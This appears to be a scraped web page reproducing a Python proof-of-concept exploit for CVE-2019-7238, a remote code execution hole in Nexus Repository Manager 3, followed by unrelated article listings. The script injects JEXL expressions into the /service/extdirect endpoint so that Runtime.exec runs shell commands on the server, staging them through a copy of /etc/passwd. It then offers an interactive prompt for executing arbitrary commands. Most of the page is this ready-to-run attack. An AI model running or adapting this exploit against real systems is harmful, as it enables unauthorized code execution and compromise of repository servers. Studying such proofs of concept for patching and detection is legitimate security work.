CVE-2019-7238 poc
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import urllib3
import requests
import base64
import json
import sys print("\nNexus Repository Manager 3 Remote Code Execution - CVE-2019-7238 \nFound by @Rico and @voidfyoo\n") proxy = {
} remote = 'http://127.0.0.1:8081' ARCH="LINUX"
# ARCH="WIN" requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def checkSuccess(r):
if r.status_code == 200:
json_data = json.loads(r.text)
if json_data['result']['total'] > 0:
print("OK")
else:
print("KO")
sys.exit()
else:
print("[-] Error status code", r.status_code)
sys.exit() print("[+] Checking if Content-Selectors exist =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==1"}, {
"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json,
proxies=proxy, verify=False, allow_redirects=False)
checkSuccess(r)
print("") while True:
try:
if ARCH == "LINUX":
command = input("command (not reflected)> ")
command = base64.b64encode(command.encode('utf-8'))
command_str = command.decode('utf-8')
command_str = command_str.replace('/', '+') print("[+] Copy file to temp directory =>", end=' ') burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"cp /etc/passwd /tmp/passwd\")"}, { "property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy, verify=False, allow_redirects=False)
checkSuccess(r) print("[+] Preparing temp file =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1cpwn2 /tmp/passwd\")"}, {
"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
verify=False, allow_redirects=False)
checkSuccess(r) print("[+] Cleaning temp file =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i /[^pwn2]/d /tmp/passwd\")"}, {
"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
verify=False, allow_redirects=False)
checkSuccess(r) print("[+] Writing command into temp file =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"sed -i 1s/pwn2/{echo," + command_str + "}|{base64,-d}>pwn.txt/g /tmp/passwd\")"}, {
"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
verify=False, allow_redirects=False)
checkSuccess(r) print("[+] Decode base64 command =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash /tmp/passwd\")"}, {
"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
verify=False, allow_redirects=False)
checkSuccess(r) print("[+] Executing command =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"bash pwn.txt\")"}, {
"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
verify=False, allow_redirects=False)
checkSuccess(r)
print('') else:
command = input("command (not reflected)> ")
print("[+] Executing command =>", end=' ')
burp0_url = remote + "/service/extdirect"
burp0_headers = {"Content-Type": "application/json"}
burp0_json = {"action": "coreui_Component", "data": [{"filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"" + command + "\")"}, {
"property": "type", "value": "jexl"}], "limit": 50, "page": 1, "sort": [{"direction": "ASC", "property": "name"}], "start": 0}], "method": "previewAssets", "tid": 18, "type": "rpc"}
r = requests.post(burp0_url, headers=burp0_headers, json=burp0_json, proxies=proxy,
verify=False, allow_redirects=False)
checkSuccess(r)
print('') except KeyboardInterrupt:
print("Exiting...")
break
脚本地址:https://github.com/mpgn/CVE-2019-7238/blob/master/CVE-2019-7238.py
漏洞分析:https://cert.360.cn/report/detail?id=3ec687ec01cccd0854e2706590ddc215
CVE-2019-7238 poc的更多相关文章
- CVE 2019 0708 安装重启之后 可能造成 手动IP地址丢失.
1. 最近两天发现 更新了微软的CVE 2019-0708的补丁之后 之前设置的手动ip地址会变成 自动获取, 造成ip地址丢失.. 我昨天遇到两个, 今天同事又遇到一个.微软做补丁也不走心啊..
- 刷题[De1CTF 2019]SSRF Me
前置知识 本题框架是flask框架,正好python面向对象和flask框架没怎么学,借着这个好好学一下 这里我直接听mooc上北京大学陈斌老师的内容,因为讲的比较清楚,直接把他的ppt拿过来,看看就 ...
- [EXP]Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
# Exploit Title: Joomla! Component Easy Shop - Local File Inclusion # Dork: N/A # Date: -- # Exploit ...
- Debian Security Advisory(Debian安全报告) DSA-4414-1 libapache2-mod-auth-mellon security update
Debian Security Advisory(Debian安全报告) DSA-4414-1 libapache2-mod-auth-mellon security update Package:l ...
- GitHub万星项目:黑客成长技术清单
最近有个GitHub项目很火,叫"Awesome Hacking",这个项目是由Twitter账号@HackwithGithub 维护,喜欢逛Twitter的安全爱好者应该了解,在 ...
- 转:GitHub 万星推荐成长技术清单
转:http://www.4hou.com/info/news/7061.html 最近两天,在reddit安全板块和Twitter上有个GitHub项目很火,叫“Awesome Hacking”. ...
- GitHub 万星推荐:黑客成长技术清单
GitHub 万星推荐:黑客成长技术清单 导语:如果你需要一些安全入门引导,“Awesome Hacking”无疑是最佳选择之一. 最近两天,在reddit安全板块和Twitter上有个GitHub项 ...
- CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...
- 如何确定Ubuntu下是否对某个CVE打了补丁
前些日子在月赛中,拿到了一台Ubuntu14.04的服务器,但并不是root权限,需要提权.我Google了一下,找到了CVE-2015-1318,CVE-2015-1328,CVE-2015 ...
- Microsoft Edge 浏览器远程代码执行漏洞POC及细节(CVE-2017-8641)
2017年8月8日,CVE官网公布了CVE-2017-8641,在其网上的描述为: 意思是说,黑客可以通过在网页中嵌入恶意构造的javascript代码,使得微软的浏览器(如Edege),在打开这个网 ...
随机推荐
- java基础篇 之 super关键字的理解
之前一直认为,super指向的是父类对象.到今天,仔细查询了资料,自己做了实验,确认这个结论是不对的.我们分一下几个点讨论下: super的作用: 第一种:用来访问父类被隐藏的成员变量 第二种:用 ...
- mac下xampp使用phpmyadmin搭建后台
情景 使用xampp搭建一个后端环境,前提已经有后端和数据库配置文件 安装和启动xampp 安装xampp没什么可说的,在https://www.apachefriends.org/index.htm ...
- Angular 从入坑到挖坑 - Router 路由使用入门指北
一.Overview Angular 入坑记录的笔记第五篇,因为一直在加班的缘故拖了有一个多月,主要是介绍在 Angular 中如何配置路由,完成重定向以及参数传递.至于路由守卫.路由懒加载等&quo ...
- 【Scala】Actor并发编程实现单机版wordCount
文章目录 对单个文本文件进行单词计数 对多个文本文件进行单词计数 对单个文本文件进行单词计数 import scala.actors.Actor import scala.io.Source //读取 ...
- 【Kafka】Kafka集群基础操作!新手上路必备~
目录 bin目录 Topic命令概览 创建Topic 查看Topic 描述Topic Producer生产数据 Consumer消费数据 增加topic分区数 增加配置 删除配置 删除Topic 所有 ...
- 【Hadoop离线基础总结】Sqoop数据迁移
目录 Sqoop介绍 概述 版本 Sqoop安装及使用 Sqoop安装 Sqoop数据导入 导入关系表到Hive已有表中 导入关系表到Hive(自动创建Hive表) 将关系表子集导入到HDFS中 sq ...
- MYSQL 日月周季年分组
首先准备几条测试数据 DROP TABLE IF EXISTS `test`;CREATE TABLE `test` ( `n_id` int(11) DEFAULT NULL, `d_created ...
- 小程序-for循环遍历的使用
.js文件: Page({ /** * 页面的初始数据 */ data: { datas:[ { title: '提交申请', txt: '选择服务类型,填写基本信息,提交' }, { title: ...
- 最简单的手机预览WEB移动端网页的方法
网上看了很多关于该问题的解决办法,各种各样的都有,个人也测试了一些, 最后总结出一个最简单且实用的方法. 1.安装nodejs node官网下载对应版本的nodejs,安装好了之后,在node.js执 ...
- SEO策略之关键词选择的原则
策略就是指为了实现某一个目标而预先制定的能够实施的方案.在制定SEO策略的时候,我们需要了解网站所有的基本情况,同时又要对网站所处的行业的竞争对手有一个准确的数据分析.SEO策略有几个比较突出的属性: ...